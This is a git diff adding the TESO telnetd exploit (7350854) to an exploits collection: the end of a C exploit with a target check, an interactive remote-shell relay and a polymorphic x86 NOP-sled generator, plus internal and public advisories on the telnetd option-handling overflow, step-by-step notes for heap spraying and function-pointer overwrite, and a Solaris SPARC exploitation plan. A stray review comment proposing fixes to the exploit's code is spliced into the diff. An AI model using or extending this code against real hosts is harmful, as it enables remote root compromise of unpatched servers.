IAC SE */ + + unsigned char buf[128]; + + read (fd, buf, sizeof (buf)); + + n = 0; + buf[n++] = IAC; /* 0xff */ + buf[n++] = AYT; /* 0xf6 */ + + buf[n++] = IAC; /* 0xff */ + buf[n++] = WILL; /* 0xfb */ + buf[n++] = TELOPT_NAOL; /* 0x08 */ + + buf[n++] = IAC; /* 0xff */ + buf[n++] = WILL; /* 0xfb */ + buf[n++] = TELOPT_ENCRYPT; /* 0x26 */ + +#ifdef DEBUG + hexdump ("check send buffer", buf, n); +#endif + if (send (fd, buf, n, 0) != n) { + perror ("xp_check:send"); + exit (EXIT_FAILURE); + } + + n = read (fd, buf, sizeof (buf)); +#ifdef DEBUG + hexdump ("check recv buffer", buf, n); +#endif + + if (memcmp (buf, expected, expect_len) == 0) { + if (memcmp (buf+expect_len, additional, additional_len) == 0) { + mode = 16; + } else { + mode = 34; + bs = bs34; + } + printf ("check: PASSED, using %dmb mode\n", mode); + + return (1); + } + + printf ("check: FAILED\n"); + + return (0); +} + + +void +shell (int sock) +{ + int l; + char buf[512]; + fd_set rfds; + + + while (1) { + FD_SET (0, &rfds); + FD_SET (sock, &rfds); + + select (sock + 1, &rfds, NULL, NULL, NULL); + if (FD_ISSET (0, &rfds)) { + l = read (0, buf, sizeof (buf)); + if (l <= 0) { + perror ("read user"); + exit (EXIT_FAILURE); + } + write (sock, buf, l); + } + + if (FD_ISSET (sock, &rfds)) { + l = read (sock, buf, sizeof (buf)); + if (l <= 0) { + perror ("read remote"); + exit (EXIT_FAILURE); + } + write (1, buf, l); + } + } +} + + +/* ripped from zodiac */ +void +hexdump (char *desc, unsigned char *data, unsigned int amount) +{ + unsigned int dp, p; /* data pointer */ + const char trans[] = + "................................ !\"#$%&'()*+,-./0123456789" + ":;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklm" + "nopqrstuvwxyz{|}~...................................." + "....................................................." 
+ "........................................"; + + + printf ("/* %s, %u bytes */\n", desc, amount); + + for (dp = 1; dp <= amount; dp++) { + fprintf (stderr, "%02x ", data[dp-1]); + if ((dp % 8) == 0) + fprintf (stderr, " "); + if ((dp % 16) == 0) { + fprintf (stderr, "| "); + p = dp; + for (dp -= 16; dp < p; dp++) + fprintf (stderr, "%c", trans[data[dp]]); + fflush (stderr); + fprintf (stderr, "\n"); + } + fflush (stderr); + } + if ((amount % 16) != 0) { + p = dp = 16 - (amount % 16); + for (dp = p; dp > 0; dp--) { + fprintf (stderr, " "); + if (((dp % 8) == 0) && (p != 8)) + fprintf (stderr, " "); + fflush (stderr); + } + fprintf (stderr, " | "); + for (dp = (amount - (16 - p)); dp < amount; dp++) + fprintf (stderr, "%c", trans[data[dp]]); + fflush (stderr); + } + fprintf (stderr, "\n"); + + return; +} + + + +unsigned long int +net_resolve (char *host) +{ + long i; + struct hostent *he; + + i = inet_addr(host); + if (i == -1) { + he = gethostbyname(host); + if (he == NULL) { + return (0); + } else { + return (*(unsigned long *) he->h_addr); + } + } + return (i); +} + + +int +net_connect (struct sockaddr_in *cs, char *server, + unsigned short int port, int sec) +{ + int n, + len, + error, + flags; + int fd; + struct timeval tv; + fd_set rset, wset; + struct sockaddr_in csa; + + if (cs == NULL) + cs = &csa; + + /* first allocate a socket */ + cs->sin_family = AF_INET; + cs->sin_port = htons (port); + fd = socket (cs->sin_family, SOCK_STREAM, 0); + if (fd == -1) + return (-1); + + if (!(cs->sin_addr.s_addr = net_resolve (server))) { + close (fd); + return (-1); + } + + flags = fcntl (fd, F_GETFL, 0); + if (flags == -1) { + close (fd); + return (-1); + } + n = fcntl (fd, F_SETFL, flags | O_NONBLOCK); + if (n == -1) { + close (fd); + return (-1); + } + + error = 0; + + n = connect (fd, (struct sockaddr *) cs, sizeof (struct sockaddr_in)); + if (n < 0) { + if (errno != EINPROGRESS) { + close (fd); + return (-1); + } + } + if (n == 0) + goto done; + + FD_ZERO(&rset); + 
FD_ZERO(&wset); + FD_SET(fd, &rset); + FD_SET(fd, &wset); + tv.tv_sec = sec; + tv.tv_usec = 0; + + n = select(fd + 1, &rset, &wset, NULL, &tv); + if (n == 0) { + close(fd); + errno = ETIMEDOUT; + return (-1); + } + if (n == -1) + return (-1); + + if (FD_ISSET(fd, &rset) || FD_ISSET(fd, &wset)) { + if (FD_ISSET(fd, &rset) && FD_ISSET(fd, &wset)) { + len = sizeof(error); + if (getsockopt(fd, SOL_SOCKET, SO_ERROR, &error, &len) < 0) { + errno = ETIMEDOUT; + return (-1); + } + if (error == 0) { + goto done; + } else { + errno = error; + return (-1); + } + } + } else + return (-1); + +done: + n = fcntl(fd, F_SETFL, flags); + if (n == -1) + return (-1); + return (fd); +} + + +/* imported from shellkit */ + +unsigned long int +random_get (unsigned long int low, unsigned long int high) +{ + unsigned long int val; + + if (low > high) { + low ^= high; + high ^= low; + low ^= high; + } + + val = (unsigned long int) random (); + val %= (high - low); + val += low; + + return (val); +} + + +void +random_init (void) +{ + srandom (time (NULL)); +} + + +int +bad (unsigned char u) +{ + if (u == '\x00' || u == '\x0a' || u == '\x0d' || u == '\x25') + return (1); + + return (0); +} + +int +badstr (unsigned char *code, int code_len, unsigned char *bad, int bad_len) +{ + int n; + + for (code_len -= 1 ; code_len >= 0 ; --code_len) { + for (n = 0 ; n < bad_len ; ++n) + if (code[code_len] == bad[n]) + return (1); + } + + return (0); +} + +unsigned long int +x86_nop_rwreg (void) +{ + unsigned long int reg; + + do { + reg = random_get (0, 7); + } while (reg == 4); /* 4 = $esp */ + + return (reg); +} + + + +unsigned long int +x86_nop_xfer (char *xferstr) +{ + int bw = 0; /* bitfield walker */ + unsigned char tgt; /* resulting instruction */ + + /* in a valid xferstr we trust */ + for (tgt = 0 ; xferstr != NULL && xferstr[0] != '\0' ; ++xferstr) { + switch (xferstr[0]) { + case ('0'): + BSET (tgt, 1, 0, bw); + break; + case ('1'): + BSET (tgt, 1, 1, bw); + break; + case ('r'): + BSET (tgt, 3, 
x86_nop_rwreg (), bw); + break; + case ('.'): + break; /* ignore */ + default: + fprintf (stderr, "on steroids, huh?\n"); + exit (EXIT_FAILURE); + break; + } + } + + if (bw != 8) { + fprintf (stderr, "invalid bitwalker: bw = %d\n", bw); + exit (EXIT_FAILURE); + } + + return (tgt); +} + + +unsigned int +x86_nop (unsigned char *dest, unsigned int dest_len, + unsigned char *bad, int bad_len) +{ + int walk; + int bcount; /* bad counter */ + char * xs; + char * xferstr[] = { + "0011.0111", /* aaa */ + "0011.1111", /* aas */ + "1001.1000", /* cbw */ + "1001.1001", /* cdq */ + "1111.1000", /* clc */ + "1111.1100", /* cld */ + "1111.0101", /* cmc */ + "0010.0111", /* daa */ + "0010.1111", /* das */ + "0100.1r", /* dec */ + "0100.0r", /* inc */ + "1001.1111", /* lahf */ + "1001.0000", /* nop */ + "1111.1001", /* stc */ + "1111.1101", /* std */ + "1001.0r", /* xchg al, */ + NULL, + }; + unsigned char tgt; + + + for (walk = 0 ; dest_len > 0 ; dest_len -= 1 , walk += 1) { + /* avoid endless loops on excessive badlisting */ + for (bcount = 0 ; bcount < 16384 ; ++bcount) { + xs = xferstr[random_get (0, 15)]; + tgt = x86_nop_xfer (xs); + + dest[walk] = tgt; + if (badstr (&dest[walk], 1, bad, bad_len) == 0) + break; + } + + /* should not happen */ + if (bcount >= 16384) { + fprintf (stderr, "too much blacklisting, giving up...\n"); + exit (EXIT_FAILURE); + } + } + + return (walk); +} + + diff --git a/exploits/7350854/7350854.id0 b/exploits/7350854/7350854.id0 new file mode 100644 index 0000000..5b092a6 Binary files /dev/null and b/exploits/7350854/7350854.id0 differ diff --git a/exploits/7350854/7350854.id1 b/exploits/7350854/7350854.id1 new file mode 100644 index 0000000..96f808d Binary files /dev/null and b/exploits/7350854/7350854.id1 differ diff --git a/exploits/7350854/7350854.nam b/exploits/7350854/7350854.nam new file mode 100644 index 0000000..3ff1397 Binary files /dev/null and b/exploits/7350854/7350854.nam differ 
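Review bot: net_resolve stores the `in_addr_t` result of inet_addr() in a `long` and compares it with -1, which never matches on LP64 targets (INADDR_NONE arrives as 4294967295), so the gethostbyname() fallback is unreachable there and 0xffffffff is handed to connect(); the `*(unsigned long *) he->h_addr` return also reads sizeof(unsigned long) bytes from a 4-byte address entry. Use `in_addr_t a = inet_addr (host); if (a == INADDR_NONE) { ... }` and copy the looked-up address with `memcpy (&a, he->h_addr, sizeof a);` instead of the cast. net_connect leaks the socket on every return after select() — the `n == -1` path, both getsockopt()/SO_ERROR failure paths, the trailing `else return (-1);` and the fcntl() restore under `done:` — so each needs the `close (fd);` the earlier error paths already do, and `len` should be `socklen_t` to match getsockopt(). In main, `char c` is compared with EOF from getopt(), which loops forever where char is unsigned; declare `int c;`. The same net_resolve and net_connect bodies are repeated verbatim in the 7350854-r.c hunk above, so both copies need the fix.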
diff --git a/exploits/7350854/7350854.til b/exploits/7350854/7350854.til new file mode 100644 index 0000000..ab7e149 Binary files /dev/null and b/exploits/7350854/7350854.til differ diff --git a/exploits/7350854/teso-advisory-011.tar.gz b/exploits/7350854/teso-advisory-011.tar.gz new file mode 100644 index 0000000..8d5f544 Binary files /dev/null and b/exploits/7350854/teso-advisory-011.tar.gz differ diff --git a/exploits/7350854/teso-advisory-011.txt b/exploits/7350854/teso-advisory-011.txt new file mode 100644 index 0000000..1c1bcbc --- /dev/null +++ b/exploits/7350854/teso-advisory-011.txt 
@@ -0,0 +1,307 @@ + + +WARNING: THIS IS NOT TO BE DISCLOSED TO ANYONE OUTSIDE OF TESO + +THIS IS A PRELIMINARY VERSION OF THE ADVISORY, IT WILL ONLY BE RELEASED IN +CASE OF LEAKAGE OF THE EXPLOIT/VULNERABILITY. + +btw, i have securely stamped myself the vulnerability, i can proof at any +point, that we knew it on 2001/06/12 or before. +(i found it on 2001/06/09) + +------ + +TESO Security Advisory +06/10/2001 + +Multiple vendor Telnet Daemon vulnerability + + +Summary +=================== + + Within most of the current telnet daemons in use today there exist a buffer + overflow in the telnet option handling. Under certain circumstances it may + be possible to exploit it to gain root priviledges remotely. + + +Systems Affected +=================== + + +Tests +=================== + + System | vulnerable | exploitable * + ----------------------------------------+--------------+------------------ + BSDI 4.x default | yes | yes + FreeBSD [2345].x default | yes | yes + IRIX 6.5 | yes | no + Linux netkit-telnetd < 0.14 | yes | ? + Linux netkit-telnetd >= 0.14 | no | + NetBSD 1.x default | yes | yes + OpenBSD 2.x | yes | ? + OpenBSD current | no | + Solaris 2.x sparc | yes | ? + ----------------------------------------+--------------+------------------ + + * = From our analysis and conclusions, which may not be correct or we may + have overseen things. Do not rely on this. + + Details about the systems can be found below. + + +Impact +=================== + + Through sending a specially formed option string to the remote telnet + daemon a remote attacker might be able to overwrite sensitive information + on the static memory pages. If done properly this may result in arbitrary + code getting executed on the remote machine under the priviledges the + telnet daemon runs on, usually root. + + +Explanation +=================== + + Within every BSD derived telnet daemon under UNIX the telnet options are + processed by the 'telrcv' function. 
This function parses the options + according to the telnet protocol and its internal state. During this + parsing the results which should be send back to the client are stored + within the 'netobuf' buffer. This is done without any bounds checking, + since it is assumed that the reply data is smaller than the buffer size + (which is BUFSIZ bytes, usually). + + However, using a combination of options, especially the 'AYT' Are You There + option, it is possible to append data to the buffer, usually nine bytes + long. To trigger this response, two bytes in the input buffer are + necessary. Since this input buffer is BUFSIZ bytes long, you can exceed the + output buffer by as much as (BUFSIZ / 2) * 9) - BUFSIZ bytes. For the + common case that BUFSIZ is defined to be 1024, this results in a buffer + overflow by up to 3584 bytes. On systems where BUFSIZ is defined to be + 4096, this is an even greater value (14336). + + Due to the limited set of characters an attacker is able to write outside + of the buffer it is difficult - if not impossible on some systems - to + exploit this buffer overflow. Another hurdle for a possible attacker may be + the lack of interesting information to modify after the buffer. + + This buffer overflow should be considered serious nevertheless, since + experience has shown that even complicated vulnerabilities can be + exploited by skilled attackers, BIND TSIG and SSH deattack come to mind. + + + Individual system notes + ======================= + + These notes include our rating about exploitability on the individual + systems. This may be invalid, due to us overlooking things or may be even + plain wrong. Also only the most common versions have been analyzed. If you + want to write an exploit, start here. 
+ + + FreeBSD 4.0-REL + FreeBSD 4.2-REL + FreeBSD 4.3-BETA + NetBSD 1.5 + ---------------- + + The binaries of the 4.0-REL (781de77b29f1fc14daab6adefa31e6b9), 4.2-REL + (a0491784c6bd4662adc4eb806138f6f8) and 4.3-BETA + (ae32821691419385103f3ca7cef89703) release of the FreeBSD operating system + and the 1.5 release (e36b5295ae58821eab4d574e729bf356) of the NetBSD + operating system, the telnet daemon contains a function pointer + 'encrypt_output' near behind the 'netobuf' buffer, which we can overwrite. + This function pointer is used under certain circumstances to encrypt the + outgoing telnet traffic, which is called from the 'netflush' function. + + By overwriting this pointer in a special way one can make it point to the + upper heap space. By abusing the telnet daemons setenv functionality prior + to the overflow one can populate the upper heap space with shellcode and + nops, right there, where the function pointer will point to. + + The exploitation works in multiple phases: + + 1. Sending of ~16mb (32000 x 510 byte) bytes of nop space and shellcode + 2. Aligning the 'nfrontp' pointer to have this position + + ... | 0x00 . 0x00 0x00 0x00 | ... + + Where '|' is the boundary to the function pointer after the 'netobuf' + buffer. The '.' position marks where 'nfrontp' points at + 3. Send an 'IAC WILL 0x08' sequence, which will write: + + ... | 0x00 0xff 0xfb 0x08 | . 0x00 ... + + 4. Trigger the function pointer by causing the telnet daemon to call + 'netflush' + + Step 1 is a tedious process and can even locally take a few minutes, + because the entire environment array is walked every time a setenv is + called, to check whether the environment variable already exists. Steps 2 + to 4 are within a final overflow buffer, they are only seperated here for + clearness. The alignment in step 2 can be a problem since we can usually + only advance the 'nfrontp' pointer by three (IAC WILL|WONT|DO|DONT OPT + sequence) or nine ("\r\n[Yes]\r\n") bytes. 
To come around this we need an + advancement 'n' for that is true: n mod 3 = 1. XXX/TODO: write + + + FreeBSD 4.3-REL + --------------- + + Is not affected by the function pointer method. But the 'envinit' array is + behind the buffer. Normally the 'envinit' array is used to initialize the + 'environ' pointer with. The 'envinit' array is in the static memory too and + can be overwritten. + + Once setenv is called within the telnetd process, the FreeBSD C library + detects that the 'environ' environment pointer points to non allocated + space ('alloced' global variable is 0) and creates a copy of the array + within the heap space. From there on, all of the telnet daemons setenv + requests are inserted within this malloc-stored array and the 'envinit' + array, which we can overwrite, becomes useless. + + XXX/Proposed exploitation method: + + Overwrite envinit[0] with a valid pointer to an environment string such as + "LD_PRELOAD=/tmp/foo.so". Normally the clients environment set requests are + checked for sanity and invalid values such as "LD_*", "_RLD_*" and + "SHELLINIT" are avoided. By using this raw overwrite method we may have a + chance to inject an environment string directly into the environment array. + To make this work a few things have to be considered. First, the pointer + must be valid and point to mapped space. By overwritting the pointer and + then continuing the normal telnet login we may be able to trick the linker + into loading our bogus libraries. This would be a local root exploit or a + remote one, if we are able to store files on the remote host. + + + IRIX 6.5 + -------- + + The good thing about IRIX telnet daemon is that it comes with symbols. The + bad thing however is that it does not look to be exploitable. The memory + layout is quite easy (/usr/etc/telnetd is a N32 binary): + + sizes: (4160) | (4) | (4) | + what: netobuf | nfrontp | pfrontp | ... 
+
+ They define - as various other telnet daemons do - an extra bogus space to
+ the 'netobuf' buffer, which is 64 bytes (called "NETSLOP" in other daemons
+ sources). 'BUFSIZ' is defined to 1024 by default on IRIX, so at first
+ glance you might think it is a problem to overwrite 4160 bytes, but it is
+ not for that we can send fragmented TCP frames which can be up to 64
+ kilobytes in size. So we can make a 4096 input buffer read without problems.
+
+ But the real problem is the 'nfrontp'. Normally the decent MIPSPro C
+ Compiler optimizes as much pointers into registers as possible, but the
+ 'nfrontp' is defined static and used across all over the code, therefore
+ its memory bound into its place and always synced with its real value. If
+ we overwrite just parts of it, it reacts very sensitive and crashes at any
+ read/write access to it. Since IRIX uses the big endian mode of the MIPS
+ CPU the 'nfrontp' is stored with the most significant byte first in the
+ memory. It points to 'netobuf' which is defined on the '.bss' segment,
+ which is located at my installation at: 0x7fc49b70 to 0x7fc4f324. The
+ 'nfrontp' content looks like:
+
+ ... (netobuf) ... | 0x7f 0xc4 0xcd 0xa8 | ...
+
+ Since the 'nfrontp' is constantly accessed throughout the code, one has to
+ make it always containing a sane value. Only the mapped areas of the
+ process can be used for this, which are summarized, your addresses may vary:
+
+ 0x7fff0000->0x7fff8000 stack
+ 0x0f9ec000->0x0fbe8000 various mapped files/libraries
+ 0x7fc00114->0x7fc4f400 .text/.*data/.bss and rest
+
+ There may be a way by excessive grow of the heap by using setenv, some more
+ research for this architecture is required to draw a decision. From the
+ current point of view its very difficult, if not impossible to exploit this
+ bug on this binary.
+
+
+ Linux netkit-telnetd version < 0.14
+ -----------------------------------
+
+ XXX/TODO:
+
+
+ Linux netkit-telnetd version >= 0.14
+ ------------------------------------
+
+ Linux netkit-telnetd from version 0.14 is not directly affected by this bug
+ since they wrap a lot of storing operations which utilize 'nfrontp' in a
+ function 'netoprintf', which does boundary checking.
+
+ However it has to be checked for a one byte overflow, which may be possible
+ at multiple occurances of the code, due to the insecure nature of handling
+ 'nfrontp'. Then, the following code in the function 'netoprintf' may fail
+ to do the boundary checking:
+
+ int len, maxsize;
+
+ maxsize = sizeof(netobuf) - (nfrontp - netobuf);
+
+ va_start(ap, fmt);
+ len = vsnprintf(nfrontp, maxsize, fmt, ap);
+ va_end(ap);
+
+ In case (nfrontp - netobuf) is greater than sizeof(netobuf), the integer
+ 'maxsize' will turn negative and casted to a very large value in the
+ snprintf handling, which makes it behave like sprintf without any boundary
+ checking.
+
+
+Solution
+===================
+
+ The vendors have been notified of the problem at the same time as the
+ general public, vendor patches for your telnet daemon that fix the bug will
+ show up soon.
+
+ Sometimes a fix might not be trivial and require a lot of changes to the
+ source code, due to the insecure nature the 'nfrontp' pointer is handled.
+ The best long term solution is to disable the telnet daemon at all, since
+ there are good and free replacements.
+
+
+Acknowledgements
+===================
+
+ The bug has been discovered by scut.
+
+ The tests and further analysis were done by smiler, zip and scut.
+
+
+Contact Information
+===================
+
+ The TESO crew can be reached by mailing to teso@team-teso.net
+ Our web page is at http://www.team-teso.net/
+
+
+References
+===================
+
+ [1] TESO
+ http://www.team-teso.net/
+
+
+Disclaimer
+===================
+
+ This advisory does not claim to be complete or to be usable for any
+ purpose. Especially information on the vulnerable systems may be inaccurate
+ or wrong. Possibly supplied exploit code is not to be used for malicious
+ purposes, but for educational purposes only.
+
+ This advisory is free for open distribution in unmodified form.
+ Articles that are based on information from this advisory should include
+ link [1].
+
+
+Exploit
+===================
+
+------
+
+
diff --git a/exploits/7350854/teso-advisory-011/teso-advisory-011.txt b/exploits/7350854/teso-advisory-011/teso-advisory-011.txt
new file mode 100644
index 0000000..64e9e71
--- /dev/null
+++ b/exploits/7350854/teso-advisory-011/teso-advisory-011.txt
@@ -0,0 +1,153 @@
+-----BEGIN PGP SIGNED MESSAGE-----
+Hash: SHA1
+
+
+- ------
+
+TESO Security Advisory
+06/10/2001
+
+Multiple vendor Telnet Daemon vulnerability
+
+
+Summary
+===================
+
+ Within most of the current telnet daemons in use today there exist a buffer
+ overflow in the telnet option handling. Under certain circumstances it may
+ be possible to exploit it to gain root priviledges remotely.
+
+
+Systems Affected
+===================
+
+ System | vulnerable | exploitable *
+ ----------------------------------------+--------------+------------------
+ BSDI 4.x default | yes | yes
+ FreeBSD [2345].x default | yes | yes
+ IRIX 6.5 | yes | no
+ Linux netkit-telnetd < 0.14 | yes | ?
+ Linux netkit-telnetd >= 0.14 | no |
+ NetBSD 1.x default | yes | yes
+ OpenBSD 2.x | yes | ?
+ OpenBSD current | no |
+ Solaris 2.x sparc | yes | ?
+ | yes | ?
+ ----------------------------------------+--------------+------------------
+
+ * = From our analysis and conclusions, which may not be correct or we may
+ have overseen things. Do not rely on this.
+
+ Details about the systems can be found below.
+
+
+Impact
+===================
+
+ Through sending a specially formed option string to the remote telnet
+ daemon a remote attacker might be able to overwrite sensitive information
+ on the static memory pages. If done properly this may result in arbitrary
+ code getting executed on the remote machine under the priviledges the
+ telnet daemon runs on, usually root.
+
+
+Explanation
+===================
+
+ Within every BSD derived telnet daemon under UNIX the telnet options are
+ processed by the 'telrcv' function. This function parses the options
+ according to the telnet protocol and its internal state. During this
+ parsing the results which should be send back to the client are stored
+ within the 'netobuf' buffer.
This is done without any bounds checking,
+ since it is assumed that the reply data is smaller than the buffer size
+ (which is BUFSIZ bytes, usually).
+
+ However, using a combination of options, especially the 'AYT' Are You There
+ option, it is possible to append data to the buffer, usually nine bytes
+ long. To trigger this response, two bytes in the input buffer are
+ necessary. Since this input buffer is BUFSIZ bytes long, you can exceed the
+ output buffer by as much as (BUFSIZ / 2) * 9) - BUFSIZ bytes. For the
+ common case that BUFSIZ is defined to be 1024, this results in a buffer
+ overflow by up to 3584 bytes. On systems where BUFSIZ is defined to be
+ 4096, this is an even greater value (14336).
+
+ Due to the limited set of characters an attacker is able to write outside
+ of the buffer it is difficult - if not impossible on some systems - to
+ exploit this buffer overflow. Another hurdle for a possible attacker may be
+ the lack of interesting information to modify after the buffer.
+
+ This buffer overflow should be considered serious nevertheless, since
+ experience has shown that even complicated vulnerabilities can be
+ exploited by skilled attackers, BIND TSIG and SSH deattack come to mind.
+
+ We have constructed a working exploit for any version of BSDI, NetBSD and
+ FreeBSD. Exploitation on Solaris sparc may be possible but if it is, it is
+ very difficult involving lots of arcane tricks. OpenBSD is not as easily
+ exploitable as the other BSD's, because they do compile with other
+ options by default, changing memory layout.
+
+
+Solution
+===================
+
+ The vendors have been notified of the problem at the same time as the
+ general public, vendor patches for your telnet daemon that fix the bug will
+ show up soon.
+
+ Sometimes a fix might not be trivial and require a lot of changes to the
+ source code, due to the insecure nature the 'nfrontp' pointer is handled.
+ The best long term solution is to disable the telnet daemon at all, since
+ there are good and free replacements.
+
+
+Acknowledgements
+===================
+
+ The bug has been discovered by scut.
+
+ The tests and further analysis were done by smiler, lorian, zip and scut.
+
+
+Contact Information
+===================
+
+ The TESO crew can be reached by mailing to teso@team-teso.net
+ Our web page is at http://www.team-teso.net/
+
+
+References
+===================
+
+ [1] TESO
+ http://www.team-teso.net/
+
+
+Disclaimer
+===================
+
+ This advisory does not claim to be complete or to be usable for any
+ purpose. Especially information on the vulnerable systems may be inaccurate
+ or wrong. Possibly supplied exploit code is not to be used for malicious
+ purposes, but for educational purposes only.
+
+ This advisory is free for open distribution in unmodified form.
+ Articles that are based on information from this advisory should include
+ link [1].
+
+
+Exploit
+===================
+
+ Not this time. Not here.
+
+- ------
+
+
+-----BEGIN PGP SIGNATURE-----
+Version: GnuPG v1.0.6 (GNU/Linux)
+Comment: For info see http://www.gnupg.org
+
+iD8DBQE7VfBscZZ+BjKdwjcRAsTcAJ9esSlkS7BGkYM1Yulaz3zINqxpmgCeM885
+3thubMQc+6S4RpHasL0qz0Y=
+=VT7y
+-----END PGP SIGNATURE-----
diff --git a/exploits/7350854/teso-howitmaybeworkonsparc.txt b/exploits/7350854/teso-howitmaybeworkonsparc.txt
new file mode 100644
index 0000000..653d1a4
--- /dev/null
+++ b/exploits/7350854/teso-howitmaybeworkonsparc.txt
@@ -0,0 +1,59 @@
+--------------------------------------------------------------------------
+TESO Internal Paper
+06/25/2001
+
+How to exploit Telnet Daemon on Solaris Sparc
+--------------------------------------------------------------------------
+
+This Paper describes how i am going to try to exploit the telnet daemon
+on Solaris Sparc maschines. The basic idea in exploiting was to overflow
+the [netobuf] until we can overwrite the pointer [netibuf] which points
+into heapspace and is meant for the incoming data. The idea was to fill
+the heap before with environment variables so that 0x00FFFE08 points
+into valid heapspace. Further was the idea to continue reading data
+again from the socket and so overwriting the malloc structure in memory.
+A carefully modification will allow us to overwrite an abritary memory
+adress (GOT, PLT, RETADDR) with our returnadress so allowing us to
+execute our own shellcode...
+
+So far the theory, now the hard reality...
+
+All info following is valid for the Solaris Sparc 2.6 in.telnetd binary
+i had access to.
+
+the memorylayout is like this:
+
+ 00000 netobuf[1024]
+ ...
++03063 ncc
+ ...
++03091 *netibuf
+
+and this memory layout is exactly what causes the problem. If we start
+sending a bunch of IAC AYT request, we will overwrite ncc with a very
+huge positive integer. This causes our telrcv function to loop again
+and again. The telrcv function will only stop its loop if ncc becomes
+negative or the ptyoutputbuffer is full. This will happen soon, but
+after flushing it, the telrcv loop will continue. The major problem is
+that [netibuf] is not big enough to hit the pointer, send an AO and
+then hit ncc again to make it negative, because this is the only way
+we are able to come to the next read...
+The solution seems easy, but because i have no solaris shell i could
+test it yet:
+We sent a lot of envvars before trying to overwrite the vars, didnt we?
+Because netibuf is malloc before the envvars, it is right infront of
+them in heapspace. So our telrcv will very soon hit into one of our
+envvars (the first one). We can store a IAC AO and lotsa 0xff 0xfb 0x80+
+there. (most probably we need more envvars). we need enough of them
+to hit ncc again. this time it will make it negative and so the loop
+ends and our new [netibuf] (which points somewhere in the middle of the
+heap) The next read should give us enough power to read in any stuff to
+corrupt the malloced envvars and so overwrite either plt, got or retloc.
+the retaddr into our shellcode is easy to get, cause we know exactly the
+offset where our netibuf is read to. (dont forget that 0xff will cause
+problems... (so keep them out of shellcode)).
+
+This all must of course be tested and implemented... i am waiting for
+a solaris sparc root account to do it...
+
+lorian
diff --git a/exploits/7350855-netkit/netkit-telnet-0.16/BUGS b/exploits/7350855-netkit/netkit-telnet-0.16/BUGS
new file mode 100644
index 0000000..484d00d
--- /dev/null
+++ b/exploits/7350855-netkit/netkit-telnet-0.16/BUGS
@@ -0,0 +1,24 @@
+telnet:
+ - will apparently sometimes assert in ungetch. I think I've
+ fixed this, so if you still see it let me know.
+ - hangs if you telnet to chargen port and push ^Z
+ (due to bogus protocol negotiation attempts)
+ - binary mode doesn't handle crlf right
+ - should warn if the connection isn't encrypted
+
+telnetd:
+ - hangs if you do the following:
+ telnet
+ log in
+ cat >/dev/null
+ type 256 'a's with no CRs
+ *THIS IS A KERNEL BUG* Patch enclosed.
+
+ - crashes in ncurses if the terminal type is undefined,
+ with some versions of ncurses.
+ - should allow passing random user envs as "TELNET_*"
+ - should set REMOTEHOST to the remote hostname
+ - passes login the -p flag instead of sending envs explicitly
+ - should only use included logout() et al. if real ones aren't
+ available in system libs.
+ - addarg() in sys_term.c does some very questionable casts.
diff --git a/exploits/7350855-netkit/netkit-telnet-0.16/ChangeLog b/exploits/7350855-netkit/netkit-telnet-0.16/ChangeLog
new file mode 100644
index 0000000..01b552e
--- /dev/null
+++ b/exploits/7350855-netkit/netkit-telnet-0.16/ChangeLog
@@ -0,0 +1,152 @@
+13-Dec-1999:
+ Per recommendation of the linux-security-audit list, don't bother
+ (in telnetd) to ask termcap/ncurses if a terminal type is good;
+ assume it is. This means telnetd no longer links against termcap.
+
+12-Dec-1999:
+ Massive buffer cleanup in telnetd; minor cleanup to telnet.
+
+5-Dec-1999:
+ Remove some more bogus #ifdefs in telnet.
+
+29-Oct-1999:
+ Fix latent bug in the array classes used in telnet.
+
+14-Sep-1999:
+ Merge old fix to keep telnet from hanging up when under heavy load
+ (Olaf Kirch, okir@caldera.de)
+
+19-Aug-1999:
+ Patches for compiling with gcc 2.95. (Jeremy Buhler,
+ jbuhler@cs.washington.edu)
+
+18-Aug-1999:
+ netkit-telnet-0.14 released.
+
+17-Aug-1999:
+ telnetd patch from Chris Evans to reject termcap entries with
+ '/' in them, as libtermcap will treat them as paths and open
+ them as root, with various interesting consequences...
+ Issue found by Tymm Twillman (tymm@coe.missouri.edu).
+
+1-Aug-1999:
+ Massive cleanup of telnetd. Changed telnetd to use openpty() from
+ libutil, so we can let libc deal with changes in pty management.
+
+1-Aug-1999:
+ Did complete y2k and y2038 audit.
+
+31-Jul-1999:
+ Redid makefiles/config stuff for new confgen version.
+
+15-Jul-1999:
+ Set the process title (visible with ps) to show the remote host name.
+ Also filter control characters from the remote host name, just in case.
+ Set environment variable REMOTEHOST also.
+
+16-Oct-1997:
+ Added OPOST to the terminal stuff a la NCSA telnet fixup
+
+23-Sep-1997:
+ Assorted signed/unsigned character fixes and hacking in telnet.
+ (Martin Mares, mj@mj.gts.cz)
+ Fix various crashes in telnet arising from undefining environment
+ variables.
+ "telnet h" no longer prints a usage message.
+
+12-Jun-1997:
+ netkit-telnet-0.10 released.
+
+08-Jun-1997:
+ More adjustments for glibc.
+ Include kernel patch to fix hang on long input; thanks to Bill
+ Hawes (whawes@star.net).
+
+19-May-1997:
+ Fix some nonsense with ayt and signals, since glibc has SIGINFO.
+
+13-May-1997:
+ 8-bit fix to telnet. (Lukas Wunner, lukas@design.de)
+ Set ut_type correctly in telnetd's logout. (Steve Coile,
+ steve@patriot.net)
+
+05-Apr-1997:
+ Added configure script to generate MCONFIG.
+ Better utmp handling in telnetd.
+
+08-Mar-1997:
+ Split from full NetKit package.
+ Generated this change log from NetKit's.
+
+29-Dec-1996
+ NetKit-0.09 released.
+ Assorted alpha/glibc patches. (Erik Troan, ewt@redhat.com)
+ Assorted bug fixes from Debian. (Peter Tobias,
+ tobias@et-inf.fho-emden.de)
+ Telnetd supports -L option for alternate login program. (Peter Tobias)
+ Hardened programs against DNS h_length spoofing attacks.
+ Use inet_aton() everywhere instead of inet_addr().
+ Fixed crash in telnet caused by ^C or ^Z or ^\ under
+ certain circumstances.
+ Rewrote telnet and telnetd man pages.
+
+22-Aug-1996
+ NetKit-B-0.08 released.
+ (almost) everything now compiles with lots of warnings turned on.
+ Massive hacking on telnet.
+ telnet honors the -E flag (was broken in .07, .07A)
+ telnetd intercepts ENV environment variable.
+ Merged libtelnet into telnet and telnetd dirs.
+ telnetd now sets idle tty devices to root.root mode 600.
+
+25-Jul-1996
+ NetKit-B-0.07A released.
+ Fixed a bug in telnet where the escape character was being ignored.
+ Fixed a bug in telnetd; now uses the correct names for the last ptys
+ (that is, ptya0-ptyef, not ptyA0-ptyEf.)
+
+23-Jul-1996
+ NetKit-B-0.07 released.
